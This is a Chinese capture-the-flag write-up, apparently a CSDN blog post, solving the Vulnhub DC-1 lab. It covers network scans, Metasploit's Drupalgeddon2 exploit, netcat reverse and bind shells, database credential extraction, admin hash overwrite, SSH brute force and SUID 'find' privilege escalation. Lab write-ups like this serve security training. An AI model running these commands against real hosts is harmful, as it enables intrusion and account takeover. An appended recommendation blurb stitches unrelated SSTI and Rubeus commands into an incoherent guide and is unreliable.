DC-1靶场通关笔记

0x00 DC-1靶场介绍

靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试
渗透要求:靶机需要获得root权限,并找到所有的5个flag
环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式

0x01 信息收集

首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机

1)目标IP收集
这里利用kali扫描域内存活主机-----arp-scan -l
发现到存活三个存活主机
2)目标端口收集
上述通过查询得到192.168.213.139 为靶机DC-1目标IP
这里利用nmap端口扫描-----nmap -sS 192.168.213.139
查询到开启80web页面
3)扫描目录
这里利用端口扫描工具-扫描到IP存在robots.txt目录
发现目录

4)web页面信息收集
通过访问robots目录发现目标路径,通过访问80端口与robots下目录一致,进入目标web继续信息收集
1.已知开源CMS-Drupal 版本:7
2.中间件服务器:apache 版本:2.2.22
3.php版本:5.4.45
4.数据库类型:后面收集到为mysql
web页面信息收集

分析数据包

0x02 攻击测试

1.已知程序是开源CMS,尝试使用cms漏洞攻击
这里利用kali-msf搜索cms模块-----search-drupal
尝试使用payload攻击
网上搜索资料逐一尝试发现攻击荷载—exploit/unix/webapp/drupal_drupalgeddon2可以使用
攻击荷载信息配置

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
sf6 exploit(unix/webapp/drupal_drupalgeddon2) > set payload php/meterpreter/reverse_tcp
set rhosts 192.168.213.139
run

攻击成功
获取反弹shell

kali:nc -lvvp 1111  
靶机 :nc -e /bin/bash 192.168.213.129 1111
kali:python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

0x03 渗透提权提升

查看目录下文件发现flag1
flag1.txt
翻译flag提示
每一个好的CMS都需要一个配置文件-你也一直需要
提示配置文件,想到网站cms的根配置文件,网上查询drupal配置文件位置
在这里插入图片描述

百度查询文件位置

find / -name settings.php

发现位置
查看网站目录 获取到flag2.txt 以及数据库为mysql账户密码
在这里插入图片描述
翻译flag2提示

蛮力和字典攻击是不是 *只有获得访问(您将需要访问)的方法。 *您可以如何处理这些凭据?

提示我们需要权限访问进行操作
首先登录数据库搜索相关信息,查看敏感表

mysql -udbuser -pR0ck3t
use databases;
use drupaldb;
show tables;
查询到敏感表users
查看表

users表
查看账户表发现密码经过特殊hash加密
之前我以及修改过密码
发现自己修改账户密码无法登录
查看到之前网站配置文件里面有个hash加密的文件 利用特殊hash加密123
登录数据库使用加密脚本得到123哈希—$S$D15BAuciJ7yEJ3lq0rLaZBw4Y/qK1fas08mWoAjZV.MwLx2gAKox

touch 11.txt
cd /var/www/
php scripts/password-hash.sh 123 > 11.txt
cat pwd.txt

修改admin密码登录后台

update users set pass='$S$D15BAuciJ7yEJ3lq0rLaZBw4Y/qK1fas08mWoAjZV.MwLx2gAKox' where uid=1;

登录后台发现flag3.txt
flag.txt

翻译flag3提示
Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow
提示我们需要特殊的fina权限去执行操作
返回终端查看账户发现flag4
flag4
查看flag4提示
flag4

您能否使用同一方法查找或访问根中的标记?

可能。但也许没那么容易。 也许是吧?
我们使用同一方法去执行操作
首先利用kali破解flag4密码

medusa -M ssh -h 192.168.213.139 -u flag4 -P /usr/share/john/password.lst -e ns -F

得到密码为:orange
ACCOUNT FOUND: [ssh] Host: 192.168.213.139 User: flag4 Password: orange [SUCCESS]

ssh登录flag4账户
flag4账户
按照前面提示利用unid提权

靶机开启监听 nc反弹shell  通过find提权
find flag4.txt -exec nc -lvp 2333 -e /bin/sh \;
回到kail:
─# nc 192.168.213.139 2333 

发现为root权限
为最高权限
回到home目录发现最后一个flag
终极flag
最后一个flag翻译
恭喜通关

DC-1渗透结束!

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值